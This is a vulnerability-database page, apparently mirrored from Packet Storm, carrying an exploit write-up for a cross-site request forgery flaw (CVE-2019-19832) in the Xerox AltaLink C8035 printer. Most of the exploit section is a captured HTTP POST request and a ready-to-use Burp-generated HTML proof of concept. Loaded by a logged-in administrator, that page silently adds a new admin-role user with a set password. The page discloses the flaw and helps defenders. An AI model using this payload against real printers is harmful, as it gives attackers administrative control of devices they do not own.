Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Xerox AltaLink C8035 Printer Cross Site Request Forgery

🗓️ 17 Dec 2019 00:00:00Reported by Ismail TasdelenType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 141 Views

Xerox AltaLink C8035 Printer CSRF Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Xerox AltaLink C8035 Printer Cross Site Request Forgery Vulnerability
17 Dec 201900:00
zdt
Circl		CVE-2019-19832
15 Mar 202408:11
circl
CNVD		Xerox AltaLink C8035 Printer Cross-Site Request Forgery Vulnerability
18 Dec 201900:00
cnvd
CVE		CVE-2019-19832
18 Dec 201917:12
cve
Cvelist		CVE-2019-19832
18 Dec 201917:12
cvelist
EUVD		EUVD-2019-9430
7 Oct 202500:30
euvd
NVD		CVE-2019-19832
18 Dec 201918:15
nvd
Prion		Cross site request forgery (csrf)
18 Dec 201918:15
prion
RedhatCVE		CVE-2019-19832
22 May 202504:56
redhatcve
`# Exploit Title: Xerox AltaLink C8035 Printer - Cross-Site Request Forgery (Add Admin)  
# Date: 2018-12-17   
# Exploit Author: Ismail Tasdelen  
# Vendor Homepage: https://www.xerox.com/  
# Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/altalink-c8000-series  
# Software : Xerox Printer  
# Product Version: AltaLink C8035  
# Vulernability Type : Cross-Site Request Forgery (Add Admin)  
# Vulenrability : Cross-Site Request Forgery  
# CVE : CVE-2019-19832  
  
# Description :  
  
The CSRF vulnerability was discovered in the AltaLink C8035 printer model of Xerox printer hardware.  
A request to add users is made in the Device User Database form field. This request is captured by  
the proxy. And a CSRF PoC HTML file is prepared. Xerox AltaLink C8035 printers allow CSRF. A request  
to add users is made in the Device User Database form field to the xerox.set URI.   
(The frmUserName value must have a unique name.)  
  
  
# HTTP POST Request :  
  
POST /dummypost/xerox.set HTTP/1.1  
Host: 158.162.130.37  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 707  
Origin: https://158.162.130.37  
Connection: close  
Referer: https://158.162.130.37/properties/authentication/UserEdit.php?nav_point_key=10  
Cookie: PHPSESSID=fd93756986787a2e338da8eae1ff2ef4; statusSelected=n1; statusNumNodes=8; CERT_INFO=8738a6169beda5f6cc754db4fc40ad63; propSelected=n59; propHierarchy=00000001000000000000000010010; LastPage=/properties/authentication/UserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp  
Upgrade-Insecure-Requests: 1  
  
NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3F&isRoles=True&isPassword=True&isCreate=True&rolesStr=6%2C1%2C2&limited=0&oid=0&minLength=1&maxLength=63&isFriendlyNameDisallowed=TRUE&isUserNameDisallowed=TRUE&isNumberRequired=&CSRFToken=34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a&currentPage=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10&_fun_function=HTTP_Set_User_Edit_fn&frmFriendlyName=Ismail+Tasdelen&frmUserName=ismailtasdelen&frmNewPassword=Test1234%21&frmRetypePassword=Test1234%21&frmOldPassword=undefined&SaveURL=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10  
  
# CSRF PoC HTML :  
  
<html>  
<!-- CSRF PoC - generated by Burp Suite Professional -->  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="https://158.162.130.37/dummypost/xerox.set" method="POST">  
<input type="hidden" name="NextPage" value="/properties/authentication/UserManager.php?" />  
<input type="hidden" name="isRoles" value="True" />  
<input type="hidden" name="isPassword" value="True" />  
<input type="hidden" name="isCreate" value="True" />  
<input type="hidden" name="rolesStr" value="6,1,2" />  
<input type="hidden" name="limited" value="0" />  
<input type="hidden" name="oid" value="0" />  
<input type="hidden" name="minLength" value="1" />  
<input type="hidden" name="maxLength" value="63" />  
<input type="hidden" name="isFriendlyNameDisallowed" value="TRUE" />  
<input type="hidden" name="isUserNameDisallowed" value="TRUE" />  
<input type="hidden" name="isNumberRequired" value="" />  
<input type="hidden" name="CSRFToken" value="34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a" />  
<input type="hidden" name="currentPage" value="/properties/authentication/UserEdit.php?nav_point_key=10" />  
<input type="hidden" name="_fun_function" value="HTTP_Set_User_Edit_fn" />  
<input type="hidden" name="frmFriendlyName" value="Ismail Tasdelen" />  
<input type="hidden" name="frmUserName" value="ismailtasdelen" />  
<input type="hidden" name="frmNewPassword" value="Test1234!" />  
<input type="hidden" name="frmRetypePassword" value="Test1234!" />  
<input type="hidden" name="frmOldPassword" value="undefined" />  
<input type="hidden" name="SaveURL" value="/properties/authentication/UserEdit.php?nav_point_key=10" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Dec 2019 00:00Current
0.4Low risk
Vulners AI Score0.4
EPSS0.00183
xerox altalink c8035 printercross-site request forgerycsrf vulnerabilityadd admindevice user databasexerox.set urihttp post request
141